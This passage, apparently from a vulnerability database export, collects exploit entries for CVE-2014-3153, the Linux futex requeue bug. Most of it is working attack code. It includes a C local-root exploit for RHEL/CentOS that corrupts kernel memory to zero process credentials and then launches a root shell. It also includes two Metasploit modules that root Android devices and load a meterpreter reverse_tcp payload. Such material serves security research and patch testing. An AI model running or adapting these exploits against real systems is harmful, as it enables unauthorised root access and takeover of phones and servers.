0);\r\n \r\n return NULL;\r\n}\r\n \r\nstatic pthread_t create_thread_do_futex_lock_pi_with_priority(int prio)\r\n{\r\n pthread_t th4;\r\n pid_t pid;\r\n \r\n do_dm_tid_read = 0;\r\n did_dm_tid_read = 0;\r\n \r\n pthread_mutex_lock(&is_thread_desched_lock);\r\n pthread_create(&th4, 0, call_futex_lock_pi_with_priority, (void *)(long)prio);\r\n pthread_cond_wait(&is_thread_desched, &is_thread_desched_lock);\r\n \r\n pid = last_tid;\r\n \r\n sync_with_child(pid, &do_dm_tid_read, &did_dm_tid_read);\r\n \r\n pthread_mutex_unlock(&is_thread_desched_lock);\r\n \r\n return th4;\r\n}\r\n \r\nstatic int server_for_setup_rt_waiter(void)\r\n{\r\n int sockfd;\r\n int yes = 1;\r\n struct sockaddr_in addr = {0};\r\n \r\n sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);\r\n \r\n setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes));\r\n \r\n addr.sin_family = AF_INET;\r\n addr.sin_port = htons(LOCAL_PORT);\r\n addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n bind(sockfd, (struct sockaddr *)&addr, sizeof(addr));\r\n \r\n listen(sockfd, 1);\r\n listenfd = sockfd;\r\n \r\n return accept(sockfd, NULL, NULL);\r\n}\r\n \r\nstatic 
int connect_server_socket(void)\r\n{\r\n int sockfd;\r\n struct sockaddr_in addr = {0};\r\n int ret;\r\n int sock_buf_size;\r\n \r\n sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);\r\n if (sockfd < 0) {\r\n printf(\"socket failed\\n\");\r\n usleep(10);\r\n } else {\r\n addr.sin_family = AF_INET;\r\n addr.sin_port = htons(LOCAL_PORT);\r\n addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n }\r\n \r\n while (connect(sockfd, (struct sockaddr *)&addr, 16) < 0) {\r\n usleep(10);\r\n }\r\n \r\n sock_buf_size = 1;\r\n setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size));\r\n \r\n return sockfd;\r\n}\r\n \r\nunsigned long iov_base0, iov_basex;\r\nsize_t iov_len0, iov_lenx;\r\n \r\nstatic void *client_to_setup_rt_waiter(void *waiter_plist)\r\n{\r\n int sockfd;\r\n struct mmsghdr msgvec[1];\r\n struct iovec msg_iov[8];\r\n unsigned long databuf[0x20];\r\n int i;\r\n int ret;\r\n struct sigaction act;\r\n \r\n act.sa_handler = void_handler;\r\n sigemptyset(&act.sa_mask);\r\n act.sa_flags = 0;\r\n act.sa_restorer = NULL;\r\n sigaction(SIGNAL_THREAD_EXIT, &act, NULL);\r\n \r\n waiter_thread_tid = syscall(__NR_gettid);\r\n setpriority(PRIO_PROCESS, 0, 12);\r\n \r\n sockfd = connect_server_socket();\r\n clientfd = sockfd;\r\n \r\n for (i = 0; i < ARRAY_SIZE(databuf); i++) {\r\n databuf[i] = (unsigned long)waiter_plist;\r\n }\r\n \r\n for (i = 0; i < ARRAY_SIZE(msg_iov); i++) {\r\n msg_iov[i].iov_base = waiter_plist;\r\n msg_iov[i].iov_len = (long)waiter_plist;\r\n }\r\n msg_iov[1].iov_base = (void *)iov_base0;\r\n \r\n msgvec[0].msg_hdr.msg_name = databuf;\r\n msgvec[0].msg_hdr.msg_namelen = sizeof databuf;\r\n msgvec[0].msg_hdr.msg_iov = msg_iov;\r\n msgvec[0].msg_hdr.msg_iovlen = ARRAY_SIZE(msg_iov);\r\n msgvec[0].msg_hdr.msg_control = databuf;\r\n msgvec[0].msg_hdr.msg_controllen = ARRAY_SIZE(databuf);\r\n msgvec[0].msg_hdr.msg_flags = 0;\r\n msgvec[0].msg_len = 0;\r\n \r\n syscall(__NR_futex, &swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &swag2, 
0);\r\n \r\n sync_with_parent(&do_socket_tid_read, &did_socket_tid_read);\r\n \r\n ret = 0;\r\n \r\n while (1) {\r\n ret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0);\r\n if (ret <= 0) {\r\n break;\r\n } else\r\n printf(\"sendmmsg ret %d\\n\", ret);\r\n }\r\n return NULL;\r\n}\r\n \r\nstatic void plist_set_next(struct list_head *node, struct list_head *head)\r\n{\r\n node->next = head;\r\n head->prev = node;\r\n node->prev = head;\r\n head->next = node;\r\n}\r\n \r\nstatic void setup_waiter_params(struct rt_mutex_waiter *rt_waiters)\r\n{\r\n rt_waiters[0].list_entry.prio = USER_PRIO_BASE + 9;\r\n rt_waiters[1].list_entry.prio = USER_PRIO_BASE + 13;\r\n plist_set_next(&rt_waiters[0].list_entry.prio_list, &rt_waiters[1].list_entry.prio_list);\r\n plist_set_next(&rt_waiters[0].list_entry.node_list, &rt_waiters[1].list_entry.node_list);\r\n}\r\n \r\nstatic bool do_exploit(void *waiter_plist)\r\n{\r\n void *magicval, *magicval2;\r\n struct rt_mutex_waiter *rt_waiters;\r\n pid_t pid;\r\n pid_t pid6, pid7, pid12, pid11;\r\n \r\n rt_waiters = PRIO_LIST_TO_WAITER(waiter_plist);\r\n \r\n syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);\r\n \r\n while (syscall(__NR_futex, &swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag) != 1) {\r\n usleep(10);\r\n }\r\n \r\n pthread_t th6 = create_thread_do_futex_lock_pi_with_priority(6);\r\n pthread_t th7 = create_thread_do_futex_lock_pi_with_priority(7);\r\n \r\n swag2 = 0;\r\n do_socket_tid_read = 0;\r\n did_socket_tid_read = 0;\r\n \r\n syscall(__NR_futex, &swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag2);\r\n \r\n if (sync_with_child_getchar(waiter_thread_tid, &do_socket_tid_read, &did_socket_tid_read) < 0) {\r\n return false;\r\n }\r\n \r\n setup_waiter_params(rt_waiters);\r\n magicval = rt_waiters[0].list_entry.prio_list.next;\r\n printf(\"Checking whether exploitable..\");\r\n pthread_t th11 = create_thread_do_futex_lock_pi_with_priority(11);\r\n \r\n if (rt_waiters[0].list_entry.prio_list.next == magicval) {\r\n 
printf(\"failed\\n\");\r\n return false;\r\n }\r\n printf(\"OK\\nSeaching good magic...\\n\");\r\n magicval = rt_waiters[0].list_entry.prio_list.next;\r\n \r\n pthread_cancel_immediately(th11);\r\n \r\n pthread_t th11_1, th11_2;\r\n while(1) {\r\n setup_waiter_params(rt_waiters);\r\n th11_1 = create_thread_do_futex_lock_pi_with_priority(11);\r\n magicval = rt_waiters[0].list_entry.prio_list.next;\r\n hack_thread_stack = (struct thread_info *)((unsigned long)magicval & 0xffffffffffffe000);\r\n rt_waiters[1].list_entry.node_list.prev = (void *)&hack_thread_stack->addr_limit;\r\n \r\n th11_2 = create_thread_do_futex_lock_pi_with_priority(11);\r\n magicval2 = rt_waiters[1].list_entry.node_list.prev;\r\n \r\n printf(\"magic1=%p magic2=%p\\n\", magicval, magicval2);\r\n if(magicval < magicval2) {\r\n printf(\"Good magic found\\nHacking...\\n\");\r\n break;\r\n } else {\r\n pthread_cancel_immediately(th11_1);\r\n pthread_cancel_immediately(th11_2);\r\n } \r\n }\r\n pwaiter11 = NODE_LIST_TO_WAITER(magicval2);\r\n pthread_mutex_lock(&hacked_lock);\r\n pthread_kill(th11_1, SIGNAL_HACK_KERNEL);\r\n pthread_cond_wait(&hacked, &hacked_lock);\r\n pthread_mutex_unlock(&hacked_lock);\r\n close(listenfd);\r\n \r\n struct rt_mutex_waiter waiter11;\r\n struct rt_mutex *pmutex;\r\n int len = read_pipe(pwaiter11, &waiter11, sizeof(waiter11));\r\n if(len != sizeof(waiter11)) {\r\n pmutex = NULL;\r\n } else {\r\n pmutex = waiter11.lock;\r\n }\r\n fix_rt_mutex_waiter_list(pmutex);\r\n \r\n pthread_cancel_immediately(th11_1);\r\n pthread_cancel_immediately(th11_2);\r\n \r\n pthread_cancel_immediately(th7);\r\n pthread_cancel_immediately(th6);\r\n close(clientfd);\r\n pthread_cancel_immediately(thread_client_to_setup_rt_waiter);\r\n \r\n exit(0);\r\n}\r\n \r\n#define MMAP_ADDR_BASE 0x0c000000\r\n#define MMAP_LEN 0x0c001000\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n unsigned long mapped_address;\r\n void *waiter_plist;\r\n \r\n printf(\"CVE-2014-3153 exploit by Chen 
Kaiqu([email\u00a0protected])\\n\");\r\n \r\n main_pid = gettid();\r\n if(fork() == 0) {\r\n iov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, /*MAP_POPULATE |*/ MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);\r\n if (iov_base0 < 0xb0000000) {\r\n printf(\"mmap failed?\\n\");\r\n return 1;\r\n }\r\n iov_len0 = 0x10000;\r\n \r\n iov_basex = (unsigned long)mmap((void *)MMAP_ADDR_BASE, MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);\r\n if (iov_basex < MMAP_ADDR_BASE) {\r\n printf(\"mmap failed?\\n\");\r\n return 1;\r\n }\r\n iov_lenx = MMAP_LEN;\r\n \r\n waiter_plist = (void *)iov_basex + 0x400;\r\n pthread_create(&thread_client_to_setup_rt_waiter, NULL, client_to_setup_rt_waiter, waiter_plist);\r\n \r\n sockfd = server_for_setup_rt_waiter();\r\n if (sockfd < 0) {\r\n printf(\"Server failed\\n\");\r\n return 1;\r\n }\r\n \r\n if (!do_exploit(waiter_plist)) {\r\n return 1;\r\n }\r\n return 0;\r\n }\r\n \r\n while(getuid())\r\n usleep(100);\r\n execl(\"/bin/bash\", \"bin/bash\", NULL);\r\n return 0;\r\n}\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22925"}, {"lastseen": "2018-01-08T13:04:03", "description": "This Metasploit module exploits a bug in futex_requeue in the linux kernel. Any android phone with a kernel built before June 2014 should be vulnerable.", "edition": 2, "published": "2015-02-10T00:00:00", "type": "zdt", "title": "Android Futex Requeue Kernel Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "modified": "2015-02-10T00:00:00", "id": "1337DAY-ID-23280", "href": "https://0day.today/exploit/description/23280", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit4 < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Common\r\n\r\n def initialize(info={})\r\n super( update_info( info, {\r\n 'Name' => 'Android futex requeue kernel exploit',\r\n 'Description' => %q{\r\n This module exploits a bug in futex_requeue in the linux kernel.\r\n Any android phone with a kernel built before June 2014 should be vulnerable. \r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Pinkie Pie', #discovery \r\n 'geohot', #towelroot\r\n 'timwr' #metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-3153' ],\r\n [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],\r\n [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ],\r\n ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'Platform' => 'android',\r\n 'Targets' => [[ 'Automatic', { }]],\r\n 'Arch' => ARCH_DALVIK,\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'android/meterpreter/reverse_tcp',\r\n },\r\n 'DefaultTarget' => 0\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new(\"WritableDir\", [ true, \"Temporary directory to write files\", \"/data/local/tmp/\" ]),\r\n ], self.class)\r\n end\r\n\r\n def put_local_file(remotefile)\r\n localfile = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-3153.elf\" )\r\n data = File.read(localfile, {:mode => 'rb'})\r\n write_file(remotefile, data)\r\n end\r\n\r\n def exploit\r\n workingdir = session.fs.dir.getwd\r\n exploitfile = \"#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}\"\r\n payloadfile = \"#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}\"\r\n\r\n put_local_file(exploitfile)\r\n cmd_exec('/system/bin/chmod 700 ' + exploitfile)\r\n write_file(payloadfile, payload.raw)\r\n\r\n tmpdir = 
datastore['WritableDir']\r\n rootclassdir = \"#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}\"\r\n rootpayload = \"#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}.jar\"\r\n\r\n rootcmd = \" mkdir #{rootclassdir} && \"\r\n rootcmd += \"cd #{rootclassdir} && \"\r\n rootcmd += \"cp \" + payloadfile + \" #{rootpayload} && \"\r\n rootcmd += \"chmod 766 #{rootpayload} && \"\r\n rootcmd += \"dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload\"\r\n \r\n process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true})\r\n process.channel.read\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23280"}], "metasploit": [{"lastseen": "2020-10-14T23:33:59", "description": "This module exploits a bug in futex_requeue in the Linux kernel, using similar techniques employed by the towelroot exploit. Any Android device with a kernel built before June 2014 is likely to be vulnerable.\n", "published": "2014-12-01T03:49:22", "type": "metasploit", "title": "Android 'Towelroot' Futex Requeue Kernel Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/ANDROID/LOCAL/FUTEX_REQUEUE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Common\n\n def initialize(info={})\n super( update_info( info, {\n 'Name' => \"Android 'Towelroot' Futex Requeue Kernel Exploit\",\n 'Description' => %q{\n This module exploits a bug in futex_requeue in the Linux kernel, using\n similar techniques employed by the towelroot exploit. 
Any Android device\n with a kernel built before June 2014 is likely to be vulnerable.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Pinkie Pie', # discovery\n 'geohot', # towelroot\n 'timwr' # metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2014-3153' ],\n [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],\n [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ],\n ],\n 'DisclosureDate' => '2014-05-03',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Platform' => [ \"android\", \"linux\" ],\n 'Payload' => { 'Space' => 2048, },\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 300,\n 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',\n },\n 'Notes' => {'AKA' => ['towelroot']},\n 'DefaultTarget' => 0,\n 'Targets' => [\n # Automatic targetting via getprop ro.build.model\n ['Automatic Targeting', { 'auto' => true }],\n\n # This is the default setting, Nexus 4, 5, 7, etc\n ['Default',\n {\n 'new_samsung' => false,\n 'iovstack' => 2,\n 'offset' => 0,\n 'force_remove' => false,\n }\n ],\n\n # Samsung devices, S3, S4, S5, etc\n ['New Samsung',\n {\n 'new_samsung' => true,\n 'iovstack' => 2,\n 'offset' => 7380,\n 'force_remove' => true,\n }\n ],\n\n # Older Samsung devices, e.g the Note 2\n ['Old Samsung',\n {\n 'new_samsung' => false,\n 'iovstack' => 1,\n 'offset' => 0,\n 'force_remove' => true,\n }\n ],\n\n # Samsung Galaxy Grand, etc\n ['Samsung Grand',\n {\n 'new_samsung' => false,\n 'iovstack' => 5,\n 'offset' => 0,\n 'force_remove' => true,\n }\n ],\n ],\n }\n ))\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n ]\n end\n\n def check\n os = cmd_exec(\"getprop ro.build.version.release\")\n unless Gem::Version.new(os) < Gem::Version.new('4.5.0')\n vprint_error \"Android version #{os} does not appear to be vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Android version #{os} appears to be vulnerable\"\n\n CheckCode::Appears\n end\n\n def exploit\n 
unless [CheckCode::Detected, CheckCode::Appears].include? check\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if target['auto']\n product = cmd_exec(\"getprop ro.build.product\")\n fingerprint = cmd_exec(\"getprop ro.build.fingerprint\")\n print_status(\"Found device: #{product}\")\n print_status(\"Fingerprint: #{fingerprint}\")\n\n if [\n \"mako\",\n \"m7\",\n \"hammerhead\",\n \"grouper\",\n \"Y530-U00\",\n \"G6-U10\",\n \"g2\",\n \"w7n\",\n \"D2303\",\n \"cancro\",\n ].include? product\n my_target = targets[1] # Default\n elsif [\n \"klte\", # Samsung Galaxy S5\n \"jflte\",# Samsung Galaxy S4\n \"d2vzw\" # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)\n ].include? product\n my_target = targets[2] # New Samsung\n elsif [\n \"t03g\",\n \"m0\",\n ].include? product\n my_target = targets[3] # Old Samsung\n elsif [\n \"baffinlite\",\n \"Vodafone_785\",\n ].include? product\n my_target = targets[4] # Samsung Grand\n else\n print_status(\"Could not automatically target #{product}\")\n my_target = targets[1] # Default\n end\n else\n my_target = target\n end\n\n print_status(\"Using target: #{my_target.name}\")\n\n local_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-3153.so\" )\n exploit_data = File.read(local_file, {:mode => 'rb'})\n\n # Substitute the exploit shellcode with our own\n space = payload_space\n payload_encoded = payload.encoded\n exploit_data.gsub!(\"\\x90\" * 4 + \"\\x00\" * (space - 4), payload_encoded + \"\\x90\" * (payload_encoded.length - space))\n\n # Apply the target config\n offsets = my_target.opts\n config_buf = [\n offsets['new_samsung'] ? -1 : 0,\n offsets['iovstack'].to_i,\n offsets['offset'].to_i,\n offsets['force_remove'] ? 
-1 : 0,\n ].pack('I4')\n exploit_data.gsub!(\"c0nfig\" + \"\\x00\" * 10, config_buf)\n\n workingdir = session.fs.dir.getwd\n remote_file = \"#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}\"\n write_file(remote_file, exploit_data)\n\n print_status(\"Loading exploit library #{remote_file}\")\n session.core.load_library(\n 'LibraryFilePath' => local_file,\n 'TargetFilePath' => remote_file,\n 'UploadLibrary' => false,\n 'Extension' => false,\n 'SaveToDisk' => false\n )\n print_status(\"Loaded library #{remote_file}, deleting\")\n session.fs.file.rm(remote_file)\n print_status(\"Waiting #{datastore['WfsDelay']} seconds for payload\")\n end\nend\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/android/local/futex_requeue.rb"}], "exploitdb": [{"lastseen": "2016-02-04T01:09:57", "description": "Linux Kernel - libfutex - Local Root for RHEL/CentOS 7.0.1406. CVE-2014-3153. Local exploit for linux platform", "published": "2014-11-25T00:00:00", "type": "exploitdb", "title": "Linux Kernel - libfutex - Local Root for RHEL/CentOS 7.0.1406", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "modified": "2014-11-25T00:00:00", "id": "EDB-ID:35370", "href": "https://www.exploit-db.com/exploits/35370/", "sourceData": "/*\r\n * CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406\r\n * By Kaiqu Chen ( kaiquchen@163.com )\r\n * Based on libfutex and the expoilt for Android by GeoHot.\r\n *\r\n * Usage:\r\n * $gcc exploit.c -o exploit -lpthread\r\n * $./exploit\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <stdbool.h>\r\n#include <pthread.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <linux/futex.h>\r\n#include <sys/socket.h>\r\n#include <sys/mman.h>\r\n#include <sys/syscall.h>\r\n#include <sys/resource.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h> 
\r\n#include <netinet/tcp.h> \r\n\r\n#define ARRAY_SIZE(a)\t(sizeof (a) / sizeof (*(a)))\r\n\r\n#define FUTEX_WAIT_REQUEUE_PI 11\r\n#define FUTEX_CMP_REQUEUE_PI 12\r\n#define USER_PRIO_BASE 120\r\n#define LOCAL_PORT 5551\r\n\r\n#define SIGNAL_HACK_KERNEL 12\r\n#define SIGNAL_THREAD_EXIT 10\r\n\r\n#define OFFSET_PID\t\t\t0x4A4 \r\n#define OFFSET_REAL_PARENT\t0x4B8\r\n#define OFFSET_CRED\t\t\t0x668\r\n\r\n#define SIZEOF_CRED\t\t\t160\r\n#define SIZEOF_TASK_STRUCT\t2912\r\n#define OFFSET_ADDR_LIMIT\t0x20\r\n\r\n#define PRIO_LIST_OFFSET\t8\t\r\n#define NODE_LIST_OFFSET\t(PRIO_LIST_OFFSET + sizeof(struct list_head))\r\n#define PRIO_LIST_TO_WAITER(list) (((void *)(list)) - PRIO_LIST_OFFSET)\r\n#define WAITER_TO_PRIO_LIST(waiter) (((void *)(waiter)) + PRIO_LIST_OFFSET)\r\n#define NODE_LIST_TO_WAITER(list) (((void *)(list)) - NODE_LIST_OFFSET)\r\n#define WAITER_TO_NODE_LIST(waiter) (((void *)(waiter)) + NODE_LIST_OFFSET)\r\n#define MUTEX_TO_PRIO_LIST(mutex) (((void *)(mutex)) + sizeof(long))\r\n#define MUTEX_TO_NODE_LIST(mutex) (((void *)(mutex)) + sizeof(long) + sizeof(struct list_head))\r\n\r\n////////////////////////////////////////////////////////////////////\r\nstruct task_struct;\r\n\r\nstruct thread_info {\r\n struct task_struct *task;\r\n void *exec_domain;\r\n int flags;\r\n int status;\r\n int cpu;\r\n int preempt_count;\r\n void *addr_limit;\r\n};\r\n\r\nstruct list_head {\r\n struct list_head *next;\r\n struct list_head *prev;\r\n};\r\n\r\nstruct plist_head {\r\n\tstruct list_head node_list;\r\n};\r\n\r\nstruct plist_node {\r\n int prio;\r\n struct list_head prio_list;\r\n struct list_head node_list;\r\n};\r\n\r\nstruct rt_mutex {\r\n\tunsigned long\t\twait_lock;\r\n\tstruct plist_head\twait_list;\r\n\tstruct task_struct\t*owner;\r\n};\r\n\r\nstruct rt_mutex_waiter {\r\n struct plist_node list_entry;\r\n struct plist_node pi_list_entry;\r\n struct task_struct *task;\r\n struct rt_mutex *lock;\r\n};\r\n\r\nstruct mmsghdr {\r\n struct msghdr msg_hdr;\r\n unsigned 
int msg_len;\r\n};\r\n\r\nstruct cred {\r\n\tint\tusage;\r\n\tint\tuid;\t\t/* real UID of the task */\r\n\tint\tgid;\t\t/* real GID of the task */\r\n\tint\tsuid;\t\t/* saved UID of the task */\r\n\tint\tsgid;\t\t/* saved GID of the task */\r\n\tint\teuid;\t\t/* effective UID of the task */\r\n\tint\tegid;\t\t/* effective GID of the task */\r\n\tint\tfsuid;\t\t/* UID for VFS ops */\r\n\tint\tfsgid;\t\t/* GID for VFS ops */\r\n};\r\n\r\n////////////////////////////////////////////////////////////////////\r\n\r\nstatic int swag = 0;\r\nstatic int swag2 = 0;\r\nstatic int main_pid;\r\n\r\nstatic pid_t waiter_thread_tid;\r\n\r\nstatic pthread_mutex_t hacked_lock;\r\nstatic pthread_cond_t hacked;\r\n\r\nstatic pthread_mutex_t done_lock;\r\nstatic pthread_cond_t done;\r\n\r\nstatic pthread_mutex_t is_thread_desched_lock;\r\nstatic pthread_cond_t is_thread_desched;\r\n\r\nstatic volatile int do_socket_tid_read = 0;\r\nstatic volatile int did_socket_tid_read = 0;\r\n\r\nstatic volatile int do_dm_tid_read = 0;\r\nstatic volatile int did_dm_tid_read = 0;\r\n\r\nstatic pid_t last_tid = 0;\r\n\r\nstatic volatile int_sync_time_out = 0;\r\n\r\nstruct thread_info thinfo;\r\nchar task_struct_buf[SIZEOF_TASK_STRUCT];\r\nstruct cred cred_buf;\r\n\r\nstruct thread_info *hack_thread_stack = NULL;\r\n\r\npthread_t thread_client_to_setup_rt_waiter;\r\n\r\nint listenfd;\r\nint sockfd;\r\nint clientfd;\r\n\r\n////////////////////////////////////////////////////////////////\r\nint gettid()\r\n{\r\n\treturn syscall(__NR_gettid);\r\n}\r\n\r\nssize_t read_pipe(void *kbuf, void *ubuf, size_t count) {\r\n\tint pipefd[2];\r\n\tssize_t len;\r\n\r\n\tpipe(pipefd);\r\n\r\n\tlen = write(pipefd[1], kbuf, count);\r\n\r\n\tif (len != count) {\r\n\t\tprintf(\"Thread %d failed in reading @ %p : %d %d\\n\", gettid(), kbuf, (int)len, errno);\r\n\t\twhile(1) { sleep(10); }\r\n\t}\r\n\r\n\tread(pipefd[0], ubuf, count);\r\n\r\n\tclose(pipefd[0]);\r\n\tclose(pipefd[1]);\r\n\r\n\treturn len;\r\n}\r\n\r\nssize_t 
write_pipe(void *kbuf, void *ubuf, size_t count) {\r\n\tint pipefd[2];\r\n\tssize_t len;\r\n\r\n\tpipe(pipefd);\r\n\r\n\twrite(pipefd[1], ubuf, count);\r\n\tlen = read(pipefd[0], kbuf, count);\r\n\r\n\tif (len != count) {\r\n\t\tprintf(\"Thread %d failed in writing @ %p : %d %d\\n\", gettid(), kbuf, (int)len, errno);\r\n\t\twhile(1) { sleep(10); }\r\n\t}\r\n\r\n\tclose(pipefd[0]);\r\n\tclose(pipefd[1]);\r\n\r\n\treturn len;\r\n}\r\n\r\nint pthread_cancel_immediately(pthread_t thid)\r\n{\r\n\tpthread_kill(thid, SIGNAL_THREAD_EXIT);\r\n\tpthread_join(thid, NULL);\r\n\treturn 0;\r\n}\r\n\r\nvoid set_addr_limit(void *sp)\r\n{\r\n\tlong newlimit = -1;\r\n\twrite_pipe(sp + OFFSET_ADDR_LIMIT, (void *)&newlimit, sizeof(long));\r\n}\r\n\r\nvoid set_cred(struct cred *kcred)\r\n{\r\n\tstruct cred cred_buf;\r\n\tint len;\r\n\r\n\tlen = read_pipe(kcred, &cred_buf, sizeof(cred_buf));\r\n\tcred_buf.uid = cred_buf.euid = cred_buf.suid = cred_buf.fsuid = 0;\r\n\tcred_buf.gid = cred_buf.egid = cred_buf.sgid = cred_buf.fsgid = 0;\r\n\tlen = write_pipe(kcred, &cred_buf, sizeof(cred_buf));\r\n}\r\n\r\nstruct rt_mutex_waiter *pwaiter11;\r\n\r\nvoid set_parent_cred(void *sp, int parent_tid)\r\n{\r\n\tint len;\r\n\tint tid;\r\n\tstruct task_struct *pparent;\r\n\tstruct cred *pcred;\r\n\t\r\n\tset_addr_limit(sp);\r\n\t\r\n\tlen = read_pipe(sp, &thinfo, sizeof(thinfo));\r\n\tif(len != sizeof(thinfo)) {\r\n\t\tprintf(\"Read %p error %d\\n\", sp, len);\r\n\t}\r\n\t\r\n\tvoid *ptask = thinfo.task;\r\n\tlen = read_pipe(ptask, task_struct_buf, SIZEOF_TASK_STRUCT);\r\n\ttid = *(int *)(task_struct_buf + OFFSET_PID);\r\n\r\n\twhile(tid != 0 && tid != parent_tid) {\r\n\t\tpparent = *(struct task_struct **)(task_struct_buf + OFFSET_REAL_PARENT);\r\n\t\tlen = read_pipe(pparent, task_struct_buf, SIZEOF_TASK_STRUCT);\r\n\t\ttid = *(int *)(task_struct_buf + OFFSET_PID);\r\n\t}\r\n\r\n\tif(tid == parent_tid) {\r\n\t\tpcred = *(struct cred **)(task_struct_buf + OFFSET_CRED);\r\n\t\tset_cred(pcred);\r\n\t} 
else\r\n\t\tprintf(\"Pid %d not found\\n\", parent_tid);\r\n\treturn;\r\n}\r\n\r\nstatic int read_voluntary_ctxt_switches(pid_t pid)\r\n{\r\n\tchar filename[256];\r\n\tFILE *fp;\r\n\tint vcscnt = -1;\r\n\r\n\tsprintf(filename, \"/proc/self/task/%d/status\", pid);\r\n\tfp = fopen(filename, \"rb\");\r\n\tif (fp) {\r\n\t\tchar filebuf[4096];\r\n\t\tchar *pdest;\r\n\t\tfread(filebuf, 1, sizeof filebuf, fp);\r\n\t\tpdest = strstr(filebuf, \"voluntary_ctxt_switches\");\r\n\t\tvcscnt = atoi(pdest + 0x19);\r\n\t\tfclose(fp);\r\n\t}\r\n\treturn vcscnt;\r\n}\r\n\r\nstatic void sync_timeout_task(int sig)\r\n{\r\n\tint_sync_time_out = 1;\r\n}\r\n\r\nstatic int sync_with_child_getchar(pid_t pid, int volatile *do_request, int volatile *did_request)\r\n{\r\n\twhile (*do_request == 0) { }\r\n\tprintf(\"Press RETURN after one second...\");\r\n\t*did_request = 1;\r\n\tgetchar();\r\n\treturn 0;\r\n}\r\n\r\nstatic int sync_with_child(pid_t pid, int volatile *do_request, int volatile *did_request)\r\n{\r\n\tstruct sigaction act;\r\n\tint vcscnt;\r\n\tint_sync_time_out = 0;\r\n\r\n\tact.sa_handler = sync_timeout_task;\r\n\tsigemptyset(&act.sa_mask);\r\n\tact.sa_flags = 0;\r\n\tact.sa_restorer = NULL;\r\n\tsigaction(SIGALRM, 